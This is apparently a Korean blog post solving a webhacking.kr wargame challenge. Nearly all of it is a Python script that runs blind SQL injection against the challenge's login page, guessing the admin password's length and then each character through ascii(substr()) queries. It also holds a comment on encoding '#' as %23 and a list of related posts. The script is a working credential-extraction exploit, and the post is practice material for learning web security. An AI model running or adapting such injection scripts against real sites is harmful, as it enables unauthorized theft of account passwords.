import requests
url='https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw='
cookie={'PHPSESSID':'자신의 세션 id'}
def find_pw_len():
pw_len=1
while True:
query=url+"' or id='admin' and length(pw)={}%23".format(pw_len)
res=requests.get(query,cookies=cookie)
#query=url+"' or id='admin' and length(pw)="+str(pw_len)+"#"
#위의 쿼리는 안됨. '#'문자가 url예약문자라 url인코딩 안됨. 반드시 %23으로 써야 php 코드에서 '#'으로 해석함.
if 'wrong' in res.text:
return pw_len
else:
pw_len+=1
def find_pw():
pw_len=find_pw_len()
for i in range(1,37):
for j in range(128):
query=url+"' or id='admin' and ascii(substr(pw,{},1))={}%23".format(i,j)
res=requests.get(query,cookies=cookie)
if 'wrong' in res.text:
print(chr(j))
break
find_pw()
'webhacking.kr' 카테고리의 다른 글
| webhacking 26(URL Encoding) (0) | 2022.12.18 |
|---|---|
| webhacking 25(LFI) (0) | 2022.12.17 |
| webhacking 24(PHP) (0) | 2022.12.17 |
| webhacking 23(XSS) (0) | 2022.12.17 |
| webhacking 22(Blind SQL Injection) (0) | 2022.12.17 |